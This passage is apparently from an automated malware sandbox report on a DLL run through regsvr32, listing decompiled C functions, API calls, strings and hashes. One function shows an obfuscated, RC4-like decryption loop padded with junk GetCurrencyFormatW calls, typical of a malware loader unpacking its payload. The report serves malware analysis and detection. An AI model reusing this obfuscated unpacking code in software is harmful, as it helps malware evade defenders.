GetCurrencyFormatW.KERNEL32 ref: 10001899
GetCurrencyFormatW.KERNEL32 ref: 100018BE

Strings

xadqsavcbdfewescGADW, xrefs: 1000168C, 1000169A, 1000169F, 100016BE, 100016DD, 10001705, 10001722, 1000174C, 10001765, 10001785, 100017A9, 100017D0, 100017ED, 10001813, 1000183D, 1000186C, 100018B3
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 1000168B, 100016A2, 100016A7, 100016C1, 100016E0, 10001708, 10001725, 1000174F, 10001768, 10001793, 100017AC, 100017D7, 100017F0, 1000181F, 10001840, 1000186F, 100018B6

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-3161301136
Opcode ID: 30569eb8c03e8ad6ff96c7b993bd8e32f972026cb2052b8f5c109cfadb6c887f
Instruction ID: 8a616b6614b71244b568cdf68a4d548a50dd06c55d0bd6723b2e1342b5ff1104
Opcode Fuzzy Hash: 30569eb8c03e8ad6ff96c7b993bd8e32f972026cb2052b8f5c109cfadb6c887f
Instruction Fuzzy Hash: 55614BB1A44315BFE204DB91CD86F1BBBECEB8AB48F111809F7409A2D1C671EA158F65

Uniqueness

Uniqueness Score: -1.00%

Function 1001DB64 Relevance: 28.9, APIs: 19, Instructions: 423
stringCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E1001DB64(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t190;
				intOrPtr* _t200;
				signed int _t203;
				signed int _t206;
				intOrPtr* _t208;
				intOrPtr _t211;
				char _t230;
				CHAR* _t236;
				intOrPtr _t237;
				signed short _t240;
				signed int _t241;
				signed int _t242;
				signed int _t250;
				signed int* _t257;
				signed int _t258;
				signed int _t277;
				signed short* _t278;
				signed short* _t279;
				signed int _t290;
				intOrPtr* _t293;
				CHAR* _t295;
				intOrPtr* _t296;
				intOrPtr _t297;
				signed int** _t299;
				void* _t300;
				void* _t301;
				void* _t302;
				void* _t313;

				_push(0x7c);
				_t190 = E1001FBC4(E10034A5C, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t300 - 0x24)) = __ecx;
				_t257 = 0;
				if( *((intOrPtr*)(__ecx)) == 0) {
					L78:
					return E1001FC9C(_t190);
				}
				 *((intOrPtr*)(_t300 - 0x54)) = 0;
				 *((intOrPtr*)(_t300 - 0x50)) = 0;
				 *(_t300 - 0x4c) = 0;
				 *((intOrPtr*)(_t300 - 0x48)) = 0;
				 *(_t300 - 4) = 0;
				E10020F40(__edi, _t300 - 0x54, 0, 0x10);
				_t302 = _t301 + 0xc;
				if( *(_t300 + 0x18) != 0) {
					 *(_t300 - 0x4c) = lstrlenA( *(_t300 + 0x18));
				}
				 *((intOrPtr*)(_t300 - 0x20)) = 0xfffffffd;
				if(( *(_t300 + 0xc) & 0x0000000c) != 0) {
					 *((intOrPtr*)(_t300 - 0x48)) = 1;
					 *((intOrPtr*)(_t300 - 0x50)) = _t300 - 0x20;
				}
				 *((intOrPtr*)(_t300 - 0x68)) = 0x10038ec0;
				 *((intOrPtr*)(_t300 - 0x64)) = _t257;
				 *((intOrPtr*)(_t300 - 0x58)) = _t257;
				 *((intOrPtr*)(_t300 - 0x5c)) = _t257;
				 *((intOrPtr*)(_t300 - 0x60)) = _t257;
				_t194 =  *(_t300 - 0x4c);
				_t308 =  *(_t300 - 0x4c) - _t257;
				 *(_t300 - 4) = 1;
				_t293 = 4;
				if( *(_t300 - 0x4c) == _t257) {
					L37:
					_t295 = 0;
					E1001BDF4(_t300 - 0x44);
					if( *(_t300 + 0x10) != _t257) {
						_t295 = _t300 - 0x44;
					}
					E10020F40(_t293, _t300 - 0x88, _t257, 0x20);
					_t200 =  *((intOrPtr*)( *((intOrPtr*)(_t300 - 0x24))));
					 *(_t300 - 0x28) =  *(_t300 - 0x28) | 0xffffffff;
					 *(_t300 + 0xc) =  *((intOrPtr*)( *_t200 + 0x18))(_t200,  *((intOrPtr*)(_t300 + 8)), 0x1003b19c, _t257,  *(_t300 + 0xc), _t300 - 0x54, _t295, _t300 - 0x88, _t300 - 0x28);
					E1001DB0D(_t300 - 0x68);
					_t203 =  *(_t300 - 0x4c);
					if(_t203 == _t257) {
						L46:
						_push( *((intOrPtr*)(_t300 - 0x54)));
						E10004D75(_t257, _t293, _t295, _t319);
						 *((intOrPtr*)(_t300 - 0x54)) = _t257;
						if( *(_t300 + 0xc) >= _t257) {
							L61:
							_t295 =  *(_t300 + 0x10);
							if(_t295 == _t257) {
								L76:
								 *(_t300 - 4) = 0;
								_t190 = E1001CE04(_t300 - 0x68);
								 *(_t300 - 4) =  *(_t300 - 4) | 0xffffffff;
								__eflags =  *((intOrPtr*)(_t300 - 0x54)) - _t257;
								if(__eflags != 0) {
									_push( *((intOrPtr*)(_t300 - 0x54)));
									_t190 = E10004D75(_t257, _t293, _t295, __eflags);
								}
								goto L78;
							}
							if(_t295 == 0xc) {
								L65:
								_t206 = (_t295 & 0x0000ffff) + 0xfffffffe;
								__eflags = _t206 - 0x13;
								if(_t206 > 0x13) {
									goto L76;
								}
								switch( *((intOrPtr*)(_t206 * 4 +  &M1001E0F4))) {
									case 0:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 1:
										__eax =  *(__ebp + 0x14);
										__ecx =  *(__ebp - 0x3c);
										 *( *(__ebp + 0x14)) = __ecx;
										goto L76;
									case 2:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 3:
										__eax =  *(__ebp + 0x14);
										 *( *(__ebp + 0x14)) =  *(__ebp - 0x3c);
										goto L76;
									case 4:
										__ecx =  *(__ebp - 0x3c);
										__eax =  *(__ebp + 0x14);
										 *__eax =  *(__ebp - 0x3c);
										__ecx =  *(__ebp - 0x38);
										 *(__eax + 4) = __ecx;
										goto L76;
									case 5:
										__eax = E10010B51(__eax, __ecx,  *(__ebp + 0x14),  *(__ebp - 0x3c));
										_push( *(__ebp - 0x3c));
										__imp__#6();
										goto L76;
									case 6:
										__ecx =  *(__ebp + 0x14);
										__eax = 0;
										__eflags =  *(__ebp - 0x3c) - __bx;
										__eax = 0 | __eflags != 0x00000000;
										 *__ecx = __eflags != 0;
										goto L76;
									case 7:
										__edi =  *(__ebp + 0x14);
										__esi = __ebp - 0x44;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										__ebx = 0;
										goto L76;
									case 8:
										goto L76;
									case 9:
										 *((char*)( *((intOrPtr*)(_t300 + 0x14)))) =  *((intOrPtr*)(_t300 - 0x3c));
										goto L76;
								}
							}
							_t208 = _t300 - 0x44;
							__imp__#12(_t208, _t208, _t257, _t295);
							_t293 = _t208;
							_t321 = _t293 - _t257;
							if(_t293 >= _t257) {
								goto L65;
							}
							__imp__#9(_t300 - 0x44);
							_push(_t293);
							L49:
							E100050DA(_t257, _t293, _t295, _t321);
							L50:
							_t322 =  *((intOrPtr*)(_t300 - 0x70)) - _t257;
							if( *((intOrPtr*)(_t300 - 0x70)) != _t257) {
								 *((intOrPtr*)(_t300 - 0x70))(_t300 - 0x88);
							}
							_t211 = E10004D4A(_t322, 0x20);
							 *((intOrPtr*)(_t300 + 0x14)) = _t211;
							_t323 = _t211 - _t257;
							 *(_t300 - 4) = 4;
							if(_t211 != _t257) {
								_push( *((intOrPtr*)(_t300 - 0x88)));
								_push(_t257);
								_push(_t257);
								_t257 = E1001D564(_t257, _t211, _t293, _t295, _t323);
							}
							_push( *((intOrPtr*)(_t300 - 0x84)));
							_t293 = __imp__#7;
							 *(_t300 - 4) = 1;
							if( *_t293() != 0) {
								_t139 = _t257 + 0x18; // 0x18
								E10005422(_t139,  *((intOrPtr*)(_t300 - 0x84)));
							}
							_t296 = __imp__#6;
							 *_t296( *((intOrPtr*)(_t300 - 0x84)));
							_push( *((intOrPtr*)(_t300 - 0x80)));
							if( *_t293() != 0) {
								_t143 = _t257 + 0xc; // 0xc
								E10005422(_t143,  *((intOrPtr*)(_t300 - 0x80)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x80)));
							_push( *((intOrPtr*)(_t300 - 0x7c)));
							if( *_t293() != 0) {
								_t147 = _t257 + 0x14; // 0x14
								E10005422(_t147,  *((intOrPtr*)(_t300 - 0x7c)));
							}
							 *_t296( *((intOrPtr*)(_t300 - 0x7c)));
							 *((intOrPtr*)(_t257 + 0x10)) =  *((intOrPtr*)(_t300 - 0x78));
							 *((intOrPtr*)(_t257 + 0x1c)) =  *((intOrPtr*)(_t300 - 0x6c));
							 *((intOrPtr*)(_t300 + 0x14)) = _t257;
							E100209E8(_t300 + 0x14, 0x10040d04);
							goto L61;
						}
						__imp__#9(_t300 - 0x44);
						_t321 =  *(_t300 + 0xc) - 0x80020009;
						if( *(_t300 + 0xc) == 0x80020009) {
							goto L50;
						}
						_push( *(_t300 + 0xc));
						goto L49;
					} else {
						_t295 =  *(_t300 + 0x18);
						_t293 = (_t203 << 4) +  *((intOrPtr*)(_t300 - 0x54)) - 0x10;
						while(1) {
							_t319 =  *_t295;
							if( *_t295 == 0) {
								goto L46;
							}
							_t230 =  *_t295;
							__eflags = _t230 - 8;
							if(_t230 == 8) {
								L43:
								__imp__#9(_t293);
								L44:
								_t293 = _t293 - 0x10;
								_t295 =  &(_t295[1]);
								__eflags = _t295;
								continue;
							}
							__eflags = _t230 - 0xe;
							if(_t230 != 0xe) {
								goto L44;
							}
							goto L43;
						}
						goto L46;
					}
				} else {
					_t290 = 0x10;
					_t297 = E10004D4A(_t308,  ~(0 | _t308 > 0x00000000) | _t194 * _t290);
					 *((intOrPtr*)(_t300 - 0x54)) = _t297;
					E10020F40(_t293, _t297, _t257,  *(_t300 - 0x4c) << 4);
					_t236 =  *(_t300 + 0x18);
					_t277 =  *(_t300 - 0x4c) << 4;
					_t302 = _t302 + 0x10;
					_t36 = _t277 - 0x10; // -16
					_t278 = _t297 + _t36;
					 *(_t300 - 0x14) = _t236;
					 *(_t300 - 0x10) = _t278;
					if( *_t236 == 0) {
						goto L37;
					}
					_t237 =  *((intOrPtr*)(_t300 + 0x1c));
					_t299 =  &(_t278[4]);
					_t258 = _t237 - 4;
					 *(_t300 - 0x1c) = _t299;
					 *((intOrPtr*)(_t300 + 0x1c)) = _t237 + 0xfffffff8;
					do {
						_t240 =  *( *(_t300 - 0x14)) & 0x000000ff;
						_t279 =  *(_t300 - 0x10);
						 *_t279 = _t240;
						if((_t240 & 0x00000040) != 0) {
							 *_t279 = _t240 & 0x0000ffbf | 0x00004000;
						}
						_t241 =  *_t279 & 0x0000ffff;
						_t313 = _t241 - 0x4002;
						if(_t313 > 0) {
							_t242 = _t241 - 0x4003;
							__eflags = _t242 - 0x12;
							if(__eflags > 0) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t242 * 4 +  &M1001E0A8))) {
								case 0:
									goto L34;
								case 1:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									_t244 =  *_t258;
									asm("sbb ecx, ecx");
									 *_t244 =  ~( *_t244) & 0x0000ffff;
									 *_t299 = _t244;
									_t245 = E1001CA7C(_t300 - 0x34, _t244, _t244, 0);
									 *(_t300 - 4) = 3;
									E1001CE9E(_t258, _t300 - 0x68, _t300,  *((intOrPtr*)(_t300 - 0x60)), _t245);
									__eflags =  *(_t300 - 0x2c);
									 *(_t300 - 4) = 1;
									if(__eflags != 0) {
										_push( *((intOrPtr*)(_t300 - 0x34)));
										E10004D75(_t258, _t293, _t299, __eflags);
									}
									goto L35;
								case 2:
									goto L35;
							}
						} else {
							if(_t313 == 0) {
								L34:
								 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
								_t258 = _t258 + _t293;
								__eflags = _t258;
								 *_t299 =  *_t258;
								goto L35;
							}
							_t250 = _t241;
							if(_t250 > 0x13) {
								goto L35;
							}
							switch( *((intOrPtr*)(_t250 * 4 +  &M1001E058))) {
								case 0:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__ax =  *__ebx;
									goto L28;
								case 1:
									goto L34;
								case 2:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 3:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 8;
									__eax =  *(__ebp + 0x1c);
									__ebx =  &(__ebx[2]);
									 *__esi =  *( *(__ebp + 0x1c));
									goto L35;
								case 4:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									goto L17;
								case 5:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									 *(__ebp - 0x1c) = __eax;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if(__eflags == 0) {
										goto L35;
									}
									__eflags = __eax;
									if(__eflags != 0) {
										goto L35;
									}
									goto L23;
								case 6:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									 *__ebx =  ~( *__ebx);
									asm("sbb eax, eax");
									L28:
									 *__esi = __ax;
									goto L35;
								case 7:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + 4;
									__edi =  *(__ebp - 0x10);
									__ebx =  &(__ebx[1]);
									__esi =  *__ebx;
									asm("movsd");
									asm("movsd");
									asm("movsd");
									asm("movsd");
									__esi =  *(__ebp - 0x1c);
									_push(4);
									_pop(__edi);
									goto L35;
								case 8:
									L24:
									 *(__ebp + 0x1c) =  *(__ebp + 0x1c) + __edi;
									__ebx = __ebx + __edi;
									__eax =  *__ebx;
									_push(__eax);
									__ecx = __ebp - 0x18;
									 *(__ebp - 0x1c) = __eax;
									__eax = E1000567F(__ebx, __ecx, __edi, __esi, __eflags);
									_push( *(__ebp - 0x18));
									 *((char*)(__ebp - 4)) = 2;
									__imp__#2();
									__eflags =  *(__ebp - 0x1c);
									 *__esi = __eax;
									if( *(__ebp - 0x1c) == 0) {
										L26:
										__ecx =  *(__ebp - 0x18);
										__eax =  *(__ebp - 0x10);
										__ecx =  *(__ebp - 0x18) + 0xfffffff0;
										 *( *(__ebp - 0x10)) = 8;
										 *((char*)(__ebp - 4)) = 1;
										__eax = E10001260(__ecx, __edx);
										goto L35;
									}
									__eflags = __eax;
									if(__eflags == 0) {
										L23:
										__eax = E10004E3A(__ebx, __ecx, __edi, __esi, __eflags);
										goto L24;
									}
									goto L26;
								case 9:
									goto L35;
								case 0xa:
									 *((intOrPtr*)(_t300 + 0x1c)) =  *((intOrPtr*)(_t300 + 0x1c)) + _t293;
									_t258 = _t258 + _t293;
									 *_t299 =  *_t258;
									goto L35;
								case 0xb:
									__eax =  *(__ebp + 0x1c);
									__eax =  *(__ebp + 0x1c) + 8;
									 *(__ebp + 0x1c) = __eax;
									__ebx =  &(__ebx[2]);
									__eflags = __ebx;
									L17:
									__ecx =  *__eax;
									 *__esi = __ecx;
									 *(__esi + 4) = __eax;
									goto L35;
							}
						}
						L35:
						 *(_t300 - 0x10) =  *(_t300 - 0x10) - 0x10;
						_t299 = _t299 - 0x10;
						 *(_t300 - 0x14) =  &(( *(_t300 - 0x14))[1]);
						 *(_t300 - 0x1c) = _t299;
					} while ( *( *(_t300 - 0x14)) != 0);
					_t257 = 0;
					goto L37;
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 1001DB6B
_memset.LIBCMT ref: 1001DB93
lstrlenA.KERNEL32(?), ref: 1001DBA3
_memset.LIBCMT ref: 1001DC0D
_memset.LIBCMT ref: 1001DE23
VariantClear.OLEAUT32(?), ref: 1001DE82
VariantClear.OLEAUT32(?), ref: 1001DEAA
SysStringLen.OLEAUT32(?), ref: 1001DF04
SysFreeString.OLEAUT32(?), ref: 1001DF24
SysStringLen.OLEAUT32(?), ref: 1001DF29
SysFreeString.OLEAUT32(?), ref: 1001DF3D
SysStringLen.OLEAUT32(?), ref: 1001DF42
SysFreeString.OLEAUT32(?), ref: 1001DF56
__CxxThrowException@8.LIBCMT ref: 1001DF70
VariantChangeType.OLEAUT32(?,?,00000000,?), ref: 1001DF8E
VariantClear.OLEAUT32(?), ref: 1001DF9E

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
String ID:
API String ID: 4128688680-0
Opcode ID: 61c2a484d30def1def3ecb87556bc7cbebaab813836ef0d38b14f81032296a9f
Instruction ID: d0b60735e7dfbc48b8ffc6b3fb26c55a134f5783589098a9cdb935b98e8b1adc
Opcode Fuzzy Hash: 61c2a484d30def1def3ecb87556bc7cbebaab813836ef0d38b14f81032296a9f
Instruction Fuzzy Hash: 77F1797090024ADFDF11EFA8D880AAEBBB5FF09340F11806AE851AB261D774DE95CF51

Uniqueness

Uniqueness Score: -1.00%

Function 100083A5 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E100083A5() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x100482fc; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x10048300 = E1000834D(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x100482e0 = 0;
						 *0x100482e4 = 0;
						 *0x100482e8 = 0;
						 *0x100482ec = 0;
						 *0x100482f0 = 0;
						 *0x100482f4 = 0;
						 *0x100482f8 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x100482e0 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x100482e4 = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x100482e8 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x100482ec = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x100482f4 = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x100482f0 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x100482f8 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x100482fc = 1;
					return _t5;
				} else {
					_t24 =  *0x100482f0; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,75BD5D80,100084F1,?,?,?,?,?,?,?,1000A3B2,00000000,00000002,00000028), ref: 100083CE
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 100083EA
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 100083FB
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 1000840C
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 1000841D
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 1000842E
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 1000843F
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10008450

Strings

MonitorFromWindow, xrefs: 100083F5
MonitorFromRect, xrefs: 10008406
USER32, xrefs: 100083C4
MonitorFromPoint, xrefs: 10008417
GetSystemMetrics, xrefs: 100083E4
GetMonitorInfoA, xrefs: 10008439
EnumDisplayMonitors, xrefs: 10008428
EnumDisplayDevicesA, xrefs: 1000844A

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: e8b2e64e54b17024b951b3e1fbf6a3b50251443a1579d1f10a064b5ef0c7bf66
Instruction ID: 374b253654f9bab27aaa6d0bbf775ac5182f219bddcb8a0b2eb046c4e2c1642a
Opcode Fuzzy Hash: e8b2e64e54b17024b951b3e1fbf6a3b50251443a1579d1f10a064b5ef0c7bf66
Instruction Fuzzy Hash: B5214F70901D229FE352EF294FC086EBAF4F34B281751493ED248D6221D7744241EB5D

Uniqueness

Uniqueness Score: -1.00%

Function 10001B36 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 205
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E10001B36(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int* _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v25;
				signed int _t85;
				signed int _t94;
				signed int _t128;
				intOrPtr _t149;
				short* _t151;
				short* _t182;

				_t84 = 0;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0;
				if(_a24 > 0) {
					_v24 = _a4 - _a12 + _a8;
					_t151 = L"xadqsavcbdfewescGADW";
					_t182 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
					while(1) {
						_t85 = GetCurrencyFormatW(_t84, 0x11d4, _t182, _t84, _t151, 0x22b9);
						asm("cdq");
						_v20 = (_t85 * _v24 *  *0x100440dc + _v20 + 1) % 0x4708;
						_v20 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v20;
						_t94 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9);
						asm("cdq");
						_v16 = (( *(_t94 * _v24 *  *0x100440d0 + _v20 + _a16) & 0x000000ff) + _v16) % 0x4708;
						_v16 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v16;
						_v25 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440d0 + _v20 + _a16));
						_v8 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v16 + _a16;
						 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v20 + _a16)) =  *_v8;
						 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440dc + _v16 + _a16)) = _v25;
						_v8 =  *(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440cc + _v16 + _a16) & 0x000000ff;
						_t128 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9);
						asm("cdq");
						_v8 = (( *(_t128 * _v24 *  *0x100440cc + _v20 + _a16) & 0x000000ff) + _v8) % 0x4708;
						_v8 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440d8 + _v8;
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440dc + _v12 + _a20;
						 *_v4 =  *_v4 ^  *(GetCurrencyFormatW(0, 0x11d4, _t182, 0, _t151, 0x22b9) * _v24 *  *0x100440e0 + _v8 + _a16);
						_v12 = _v12 + 1;
						_t149 = _v12;
						if(_t149 >= _a24) {
							break;
						}
						_t84 = 0;
					}
					return _t149;
				}
				return 0;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001B8A
GetCurrencyFormatW.KERNEL32 ref: 10001BB8
GetCurrencyFormatW.KERNEL32 ref: 10001BDA
GetCurrencyFormatW.KERNEL32 ref: 10001C10
GetCurrencyFormatW.KERNEL32 ref: 10001C32
GetCurrencyFormatW.KERNEL32 ref: 10001C5B
GetCurrencyFormatW.KERNEL32 ref: 10001C81
GetCurrencyFormatW.KERNEL32 ref: 10001CAC
GetCurrencyFormatW.KERNEL32 ref: 10001CD5
GetCurrencyFormatW.KERNEL32 ref: 10001CFF
GetCurrencyFormatW.KERNEL32 ref: 10001D35
GetCurrencyFormatW.KERNEL32 ref: 10001D57
GetCurrencyFormatW.KERNEL32 ref: 10001D7D

Strings

xadqsavcbdfewescGADW, xrefs: 10001B6D, 10001B85, 10001BAD, 10001BCF, 10001C05, 10001C27, 10001C50, 10001C76, 10001CA2, 10001CCB, 10001CF4, 10001D2A, 10001D4C, 10001D72
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001B72, 10001B87, 10001BB0, 10001BD2, 10001C08, 10001C2A, 10001C53, 10001C7D, 10001CA5, 10001CCE, 10001CF7, 10001D2D, 10001D4F, 10001D79

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
